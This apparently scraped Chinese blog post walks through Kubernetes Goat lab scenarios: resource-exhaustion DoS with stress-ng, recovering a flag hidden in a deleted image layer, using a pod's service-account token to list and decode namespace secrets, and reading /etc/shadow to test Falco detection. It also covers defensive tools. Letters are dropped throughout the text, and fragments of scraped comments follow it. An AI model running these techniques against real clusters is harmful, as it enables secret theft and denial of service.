假如Kubernetes部署的yaml文件没有对资源的使用进行限制,那么攻击者可能就可以消耗pod/deployment的资源,从而对Kubernetes造成DOS

这里使用stress-ng压力测试程序来测试

先看看初始资源占用情况,cpu是0,内存是不超过10M

代码语言:javascript代码运行次数:0运行复制
$ docker stats --no-stream | grep hunger
842ef0c146a   k8s_hunger-check_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-420-9265-1447b817e0d_0              0.00%     6.609MiB / 15.64GiB   0.04%     0B / 0B   0B / 0B          8
02af980754   k8s_POD_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-420-9265-1447b817e0d_0                       0.00%     1.227MiB / 15.64GiB   0.01%     0B / 0B   0B / 0B          1

执行下面命令进行压力测试,–vm是启动8个worker去匿名mmap,–vm-bytes是每个worker分配的内存,但是我设置2G发现16内存没用满,只用了2-G,所以索性改为16G,最后–timeout就是压力测试60s后停止

代码语言:javascript代码运行次数:0运行复制
stress-ng --vm 8 --vm-bytes 16G --timeout 60s

下面是压力测试中在node执行htop的截图

在node执行docker stats | grep hunger,到后面直接就获取不了

这样可能会使其他pod可能无法获得执行的资源,无法处理用户请求或者超级卡顿,假如是自己的服务器可能消耗更多的电费,假如是云服务则可能需要支付更加昂贵的账单。

我们查看一下部署的yaml文件,可以看到资源限制是被注释掉的,不过1000G跟没限制也差不多了

Hacker container

代码语言:javascript代码运行次数:0运行复制
kubectl run -it --rm hacker-container --image=madhuakula/hacker-container -- sh

启动pod后我们可以用amicontained评估容器的权限等信息

代码语言:javascript代码运行次数:0运行复制
~ # amicontained
Container Runtime: docker
Has amespaces:
	pid: true
	user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
	BOUDIG -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (22):
	MSGRCV SYSLOG SETSID VHAGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUT2 SWAPO SWAPOFF REBOOT SETHOSTAME SETDOMAIAME IIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD PERF_EVET_OPE FAOTIFY_IIT OPE_BY_HADLE_AT FIIT_MODULE KEXEC_FILE_LOAD
Looking for Docker.sock

还可以用里面的nikto进行web漏洞扫描,看着效果不怎么样

代码语言:javascript代码运行次数:0运行复制
~ # nikto.pl -host http://metadata-db
- ikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.105.74.206
+ Target Hostname:    metadata-db
+ Target Port:        80
+ Start Time:         2022-06-22 08:20:04 (GMT0)
---------------------------------------------------------------------------
+ Server: o banner retrieved
+ The anti-clickjacking X-Frame-Opti header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Opti header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ o CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid respe with junk HTTP methods, this may cause false positives.
+ 77 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2022-06-22 08:21:5 (GMT0) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

隐藏在镜像层中的信息

在docker镜像中,很容易可能将密码、私钥、令牌等放入到了镜像中

作者设计了一个hidden-in-layers的jobs

代码语言:javascript代码运行次数:0运行复制
$ kubectl get jobs
AME               COMPLETIOS   DURATIO   AGE
batch-check-job    1/1           6s        6d5h
hidden-in-layers   0/1           6d5h       6d5h
kube-bench-node    1/1           29s        46h

查看部署文件,确认镜像名称

代码语言:javascript代码运行次数:0运行复制
$ cat ~/kubernetes-goat/scenarios/hidden-in-layers/deployment.yaml | grep image
        image: madhuakula/k8s-goat-hidden-in-layers

到node查看镜像的信息,通过docker inspect可以看到最终执行的cmd命令,但是这样只能看到一个命令

代码语言:javascript代码运行次数:0运行复制
$  madhuakula/k8s-goat-hidden-in-layers | grep "Cmd" -A 5
            "Cmd": null,
            "Image": "",
            "Volumes": null,
            "WorkingDir": "",
            "Entrypoint": null,
            "OnBuild": null,
--
            "Cmd": [
                "sh",
                "-c",
                "tail -f /dev/null"
            ],
            "ArgsEscaped": true,

之前已经用过docker history来看每一层所执行的命令了,这里我们可以看到一个/root/的文件,但是在后面删掉了

代码语言:javascript代码运行次数:0运行复制
$ docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers
IMAGE                                                                     CREATED        CREATED BY                                                                                                              SIZE      COMMET
sha256:8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc7556177bd68607   5 weeks ago    CMD ["sh" "-c" "tail -f /dev/null"]                                                                                     0B        buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    RU /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/     && rm -rf /root/ # buildkit   28B       buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    ADD  /root/ # buildkit                                                                              41B       buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    LABEL MAITAIER=Madhu Akula IFO=Kubernetes Goat                                                                       0B        buildkit.dockerfile.v0
<missing>                                                                 2 months ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]                                                                                      0B        
<missing>                                                                 2 months ago   /bin/sh -c #(nop) ADD file:5d67d25daa14ce1f6cf66e4c7fd4f4b85a759a9d9efbfd9ff852b5b56e4 in /                        5.57MB

还有一个工具是,这个更全面,基于进行构建的,可以搜索secret files(通过将image保存到文件,之后解压搜索里面的文件),打印环境变量(docker inspect获取),具体实现可以查看.go.go

代码语言:javascript代码运行次数:0运行复制
$ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
$ dfimage  madhuakula/k8s-goat-hidden-in-layers:latest
Analyzing madhuakula/k8s-goat-hidden-in-layers:latest
Docker Version: 
GraphDriver: overlay2
Environment Variables
|PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Image user
|User is root

Potential secrets:
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-4a6a0840.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-524ef4b.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-5261cecb.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-6165ee59.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-61666ef.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/ DHCP server configs dhcpd[^ ]*.conf 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
Dockerfile:
CMD ["/bin/sh"]
LABEL MAITAIER=Madhu Akula IFO=Kubernetes Goat
ADD  /root/ # buildkit
	root/
	root/

RU RU echo "Contributed by Rewanth Cool" >> /root/  \
	&& rm -rf /root/ # buildkit
CMD ["sh" "-c" "tail -f /dev/null"]

可以看到ADD /root/之后的几行有点异常,不过影响不大

搜索dfimage的时候,还有一个github上也叫dfimage的可以将镜像还原成一个Dockerfile,是基于docker history,不用我们自己手动还原

代码语言:javascript代码运行次数:0运行复制
.py#L17

执行结果FROM这个输出肯定是不对的了,第二行也看不出什么

代码语言:javascript代码运行次数:0运行复制
$ docker run -v /var/run/docker.sock:/var/run/docker.sock dfimage madhuakula/k8s-goat-hidden-in-layers:latest
FROM madhuakula/k8s-goat-hidden-in-layers:latest
ADD file:90e56af1188c7f028d244a0d70b85d8bef8587a41f1da8eaca2aba8964ef in /
CMD ["/bin/sh"]
RU LABEL MAITAIER=Madhu Akula IFO=Kubernetes Goat
RU ADD  /root/ # buildkit
RU RU /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/     \
    && rm -rf /root/ # buildkit
RU CMD ["sh" "-c" "tail -f /dev/null"]

但是这只是让我们看到有这个文件,我们需要看看这个文件,直接启动容器肯定没有,因为已经删掉了

代码语言:javascript代码运行次数:0运行复制
$ kubectl run test --rm --restart=ever -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh
If you don't see a command prompt, try pressing enter.
/ # ls
bin    dev    etc    home   lib    media  mnt    opt    proc   root   run    sbin   srv    sys    tmp    usr    var
/ # cd root/
~ # ls -la
total 16
drwx------    1 root     root          4096 Jun 24 08: .
drwxr-xr-x    1 root     root          4096 Jun 24 08:29 ..
-rw-------    1 root     root            19 Jun 24 08:4 .ash_history
-rw-r--r--    1 root     root            28 May 16 20:41 
~ #

但是在删掉的那一层的上一层还有,我们可以先将整个image保存到文件

代码语言:javascript代码运行次数:0运行复制
# root @ nsfocus  in ~ [16:5:15]
$ mkdir hidden-in-layers
# root @ nsfocus  in ~ [16:5:24]
$ docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers/
# root @ nsfocus  in ~ [16:5:48]
$ cd hidden-in-layers/
# root @ nsfocus  in ~/hidden-in-layers [16:5:52]
$ tar -xvf 
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/VERSIO
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/json
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/VERSIO
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/json
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc7556177bd68607.json
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/VERSIO
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/json
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/
manifest.json
repositories

这里面有层是有文件的,少的时候我们当然可以全部一个一个解压,去

但是有个工具可以快速确认是哪个id的,就是dive

代码语言:javascript代码运行次数:0运行复制
wget .10.0/dive_0.10.0_linux_amd64.deb
apt install ./dive_0.10.0_linux_amd64.deb

运行

代码语言:javascript代码运行次数:0运行复制
dive madhuakula/k8s-goat-hidden-in-layers

通过下图,我们就知道在66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55那里

最终获取到文件

代码语言:javascript代码运行次数:0运行复制
# root @ nsfocus  in ~/hidden-in-layers [16:9:52]
$ cd 66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:9:54]
$ ls
json    VERSIO
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:9:55]
$ tar -xf ./ 
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:40:05]
$ ls
json    root  VERSIO
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:40:07]
$ cd root/
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/root [16:40:10]
$ ls

# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/root [16:40:12]
$ cat  
k8s-goat-b7a7dc7f51f4014ddf446c25f8b772

RBAC 最低权限配置错误

在 Kubernetes 早期,没有 RBAC(role-based access control,基于角的访问控制)这样的概念,主要使用 ABAC(attribute-based access control,基于属性的访问控制)。现在它拥有像 RBAC 这样的超能力来实现最小权限的安全原则。尽管如此,有时权限还是给多了。

目标挑战是查k8svaultapikey

默认情况下,Kubernetes 将所有令牌和服务帐户信息存储在/var/run/secrets/kubernetes.io/serviceaccount/

代码语言:javascript代码运行次数:0运行复制
root@hunger-check-deployment-56d65977f6-k68g9:/# cd /var/run/secrets/kubernetes.io/serviceaccount/
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# ls -la
total 4
drwxrwxrwt  root root  140 Jun 24 08:50 .
drwxr-xr-x  root root 4096 Jun 16 02:55 ..
drwxr-xr-x 2 root root  100 Jun 24 08:50 ..2022_06_24_08_50_4.045810252
lrwxrwxrwx 1 root root   1 Jun 24 08:50 ..data -> ..2022_06_24_08_50_4.045810252
lrwxrwxrwx 1 root root   1 Jun 16 02:5  -> ..data/
lrwxrwxrwx 1 root root   16 Jun 16 02:5 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Jun 16 02:5 token -> ..data/token

一些目录和地址在环境变量都有

代码语言:javascript代码运行次数:0运行复制
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep SERVICEACCOUT
SERVICEACCOUT=/var/run/secrets/kubernetes.io/serviceaccount
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep KUBERETES_SERVICE_HOST
KUBERETES_SERVICE_HOST=10.96.0.1
代码语言:javascript代码运行次数:0运行复制
export APISERVER=https://${KUBERETES_SERVICE_HOST}
export SERVICEACCOUT=/var/run/secrets/kubernetes.io/serviceaccount
# 命令空间路径
export AMESPACE=$(cat ${SERVICEACCOUT}/namespace)
export TOKE=$(cat ${SERVICEACCOUT}/token)
export CACERT=${SERVICEACCOUT}/

这时我们就可以访问api服务器了,也看得服务器的真实ip

代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKE}" -X GET ${APISERVER}/api
{
  "kind": "APIVersi",
  "versi": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "192.168.2.174:644"
    }
  ]
}

查询default命名空间的secrets,可以看到没权限

代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Athorization: Bearer ${TOKE}" -X GET ${APISERVER}/api/v1/secrets
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
    
  },
  "status": "Failure",
  "message": "secrets is forbidden: User \"system:serviceaccount:big-monolith:big-monolith-sa\" cannot list resource \"secrets\" in API group \"\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
    "kind": "secrets"
  },
  "code": 40
}

查看当前命名空间中的secrets

代码语言:javascript代码运行次数:0运行复制
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKE}" -X GET ${APISERVER}/api/v1/namespaces/${AMESPACE}/secrets

查看当前命名空间中的pods

代码语言:javascript代码运行次数:0运行复制
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKE}" -X GET ${APISERVER}/api/v1/namespaces/${AMESPACE}/pods
代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Athorization: Bearer ${TOKE}" -X GET ${APISERVER}/api/v1/namespaces/${AMESPACE}/secrets | grep k8svaultapikey
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9984    0  9984    0     0   154k      0 --:--:-- --:--:-- --:--:--  154k
          "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"k8svaultapikey\":\"azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U=\"},\"kind\":\"Secret\",\"metadata\":{\"annotati\":{},\"name\":\"vaultapikey\",\"namespace\":\"big-monolith\"},\"type\":\"Opaque\"}\n"
            "fieldsV1": {"f:data":{".":{},"f:k8svaultapikey":{}},"f:metadata":{"f:annotati":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:type":{}}
        "k8svaultapikey": "azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U="

看着是base64

代码语言:javascript代码运行次数:0运行复制
$ echo "azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U=" | base64 -d
k8s-goat-85057846a8046a25b5f8fa2649dce

我们回头来看部署的yaml,可以看到resources直接给了所有resources的get、 watch 和 list权限

KubeAudit - 审计 Kubernetes 集

kubeaudit是一个开源工具,这个工具需要cluster administrator privileges,tiller 这个账户有这个权限,所以指定serviceaccount为tiller启动hacker容器,但是我这没有这个账户,

代码语言:javascript代码运行次数:0运行复制
$ kubectl run -n kube-system --serviceaccount=tiller --rm --restart=ever -it --image=madhuakula/hacker-container -- bash
Flag --serviceaccount has been deprecated, has no effect and will be removed in the future.
Error from server (Forbidden): pods "bash" is forbidden: error looking up service account kube-system/tiller: serviceaccount "tiller" not found

我觉得本地模式ocal Mode最方便,直接在master下载一个bin,直接运行

代码语言:javascript代码运行次数:0运行复制
$ ./kubeaudit all
W0627 14:19:28.6285   957 warnings.go:70] v1 ComponentStatus is deprecated in v1.19+
W0627 14:19:2.81222   957 warnings.go:70] extensi/v1beta1 Ingress is deprecated in v1.14+, unavailable in v1.22+; use networking.k8s.io/v1 Ingress
W0627 14:19:.25577   957 warnings.go:70] policy/v1beta1 PodSecurityPolicy is deprecated in v1.21+, unavailable in v1.25+

---------------- Results for ---------------

  apiVersion: v1
  kind: amespace
  metadata:
    name: big-monolith

--------------------------------------------

-- [error] MissingDefaultDenyIngressAndEgressetworkPolicy
   Message: amespace is missing a default deny ingress and egress etworkPolicy.
   Metadata:
      amespace: big-monolith
	  
......
......
......
---------------- Results for ---------------

  apiVersion: apps/v1
  kind: Deployment
  metadata:
    name: hunger-check-deployment
    namespace: big-monolith

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hunger-check' should be added.
   Metadata:
      Container: hunger-check
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hunger-check

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hunger-check

-- [warning] ImageTagMissing
   Message: Image tag is missing.
   Metadata:
      Container: hunger-check

-- [warning] LimitsotSet
   Message: Resource limits not set.
   Metadata:
      Container: hunger-check

-- [error] RunAsonRootPSCilCSCil
   Message: runAsonRoot should be set to true or runAsUser should be set to a value > 0 either in the container SecurityContext or PodSecurityContext.
   Metadata:
      Container: hunger-check

-- [error] AllowPrivilegeEscalationil
   Message: allowPrivilegeEscalation not set which allows privilege escalation. It should be set to 'false'.
   Metadata:
      Container: hunger-check

-- [warning] Privilegedil
   Message: privileged is not set in container SecurityContext. Privileged defaults to 'false' but it should be explicitly set to 'false'.
   Metadata:
      Container: hunger-check

-- [error] ReadOnlyRootFilesystemil
   Message: readOnlyRootFilesystem is not set in container SecurityContext. It should be set to 'true'.
   Metadata:
      Container: hunger-check

-- [error] SeccompAnnotationMissing
   Message: Seccomp annotation is missing. The annotation seccomp.security.alpha.kubernetes.io/pod: runtime/default should be added.
   Metadata:
      MissingAnnotation: seccomp.security.alpha.kubernetes.io/pod
......
......
......
---------------- Results for ---------------

  apiVersion: batch/v1
  kind: Job
  metadata:
    name: hidden-in-layers
    namespace: default

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hidden-in-layers' should be added.
   Metadata:
      Container: hidden-in-layers
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hidden-in-layers

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
   Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' on either the ServiceAccount or on the PodSpec or a non-default service account should be used.

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hidden-in-layers

通过查看结果,这个工具会对amespace、Deployment 、DaemonSet和Job这些类型进行检查。

Falco - 运行时安全监控和检测

需要安装helm v,安装:/

将 helm chart 部署到 Kubernetes 集中,并安装falco

代码语言:javascript代码运行次数:0运行复制
helm repo add falcosecurity 
helm repo update
helm install falco falcosecurity/falco
代码语言:javascript代码运行次数:0运行复制
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:9:48]
$ helm repo add falcosecurity 
"falcosecurity" has been added to your repositories
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:40:12]
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:42:00]
$ helm install falco falcosecurity/falco
AME: falco
LAST DEPLOYED: Mon Jun 27 14:50:10 2022
AMESPACE: default
STATUS: deployed
REVISIO: 1
TEST SUITE: one
OTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


o further action should be required.


Tip: 
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick. 
Full list of outputs: .
You can enable its deployment with `--set =true` or in your values.yaml. 
See: .yaml for configuration values.

Falco 可以检测任何涉及进行 Linux 系统调用的行为并发出警报。Falco 警报可以通过使用特定的系统调用、它们的参数以及调用进程的属性来触发。例如,Falco 可以轻松检测事件,包括但不限于:

  • shell 在 Kubernetes 的容器或 pod 中运行。
  • 容器正在特权模式下运行,或者mount到敏感路径,比如/proc。
  • 生成意外的子进程。
  • 意外读取敏感文件,例如/etc/shadow.
  • 将非设备类型的文件写入/dev.
  • 标准的系统二进制文件(例如ls)对外网络连接。
  • 特权 pod 在 Kubernetes 集中启动。

查看falco pod的状态

代码语言:javascript代码运行次数:0运行复制
kubectl get pods --selector app=falco

从 Falco 系统获取日志

代码语言:javascript代码运行次数:0运行复制
kubectl logs -f -l app=falco

我们尝试启动一个madhuakula/hacker-container,并读取敏感文件/etc/shadow,看看falco是否会检测到

代码语言:javascript代码运行次数:0运行复制
kubectl run --rm --restart=ever -it --image=madhuakula/hacker-container -- bash
cat /etc/shadow
vi /etc/shadow

手动获取的日志因为输出缓存区的原因可能输出会延迟,所以想快点看到结果可以多次执行命令

Popeye - Kubernetes 集sanitizer

Popeye 是一个实用程序,可扫描实时 Kubernetes 集并报告已部署资源和配置的潜在问题。

能够检测的问题可以查看

下载

代码语言:javascript代码运行次数:0运行复制
wget .10.0/popeye_Linux_x86_gz
tar -xvf popeye_Linux_x86_gz

直接运行二进制文件即可

最后还给你的集评个分

使用 SP 保护网络边界

创建实验环境,启动一个nginx

代码语言:javascript代码运行次数:0运行复制
kubectl run --image=nginx website --labels app=website --expose --port 80

启动另一个pod尝试访问这个nginx,可以看到可以访问

代码语言:javascript代码运行次数:0运行复制
$ kubectl run --rm -it --image=alpine temp -- sh
If you don't see a command prompt, try pressing enter.
/ # wget -qO- http://website
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 5em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="/">nginx</a>.<br/>
Commercial support is available at
<a href="/">nginx</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
/ #

新建一个etwork策略文件website-deny.yaml

代码语言:javascript代码运行次数:0运行复制
$ cat website-deny.yaml 
kind: etworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: website-deny
spec:
  podSelector:
    matchLabels:
      app: website
  ingress: []
``` 
应用这个策略

$ kubectl apply -f website-deny.yaml networkpolicyworking.k8s.io/website-deny created

代码语言:javascript代码运行次数:0运行复制
再次启动一个临时pod访问
代码语言:javascript代码运行次数:0运行复制
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。 原始发表:2022-06-1,如有侵权请联系 cloudcommunity@tencent 删除容器kubernetes镜像漏洞权限

#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格

本文地址:http://www.dnpztj.cn/biancheng/1207103.html

相关标签:无
上传时间: 2025-07-24 12:33:47
留言与评论(共有 17 条评论)
本站网友 板蓝根股票
20分钟前 发表
5Z" generateame
本站网友 解放1
6分钟前 发表
token - configMap
本站网友 东海堂
20分钟前 发表
Arial
本站网友 管理费用包括
29分钟前 发表
cap_wake_alarm
本站网友 启悦
11分钟前 发表
["madhuakula/k8s-goat-alpine"
本站网友 住房贷款
19分钟前 发表
"tag"
本站网友 莱阳二手房网
20分钟前 发表
true和privileged
本站网友 美皮护
15分钟前 发表
/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope 2
本站网友 pat文件
12分钟前 发表
没有 RBAC(role-based access control
本站网友 直播加速
4分钟前 发表
"72916" uid
本站网友 对对网
7分钟前 发表
90e56af1188c7f028d244a0d70b85d8bef8587a41f1da8eaca2aba8964ef in / CMD ["/bin/sh"] RU LABEL MAITAIER=Madhu Akula IFO=Kubernetes Goat RU ADD /root/ # buildkit RU RU /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/ \ && rm -rf /root/ # buildkit RU CMD ["sh" "-c" "tail -f /dev/null"]但是这只是让我们看到有这个文件
本站网友 餐饮管理软件
7分钟前 发表
00
本站网友 宝马会10
5分钟前 发表
54
本站网友 婴儿抚触的好处
28分钟前 发表
"reason"
本站网友 太阳能路灯厂家
6分钟前 发表
看看falco是否会检测到代码语言:javascript代码运行次数:0运行复制kubectl run --rm --restart=ever -it --image=madhuakula/hacker-container -- bash cat /etc/shadow vi /etc/shadow手动获取的日志因为输出缓存区的原因可能输出会延迟
本站网友 成长博客
18分钟前 发表
-- --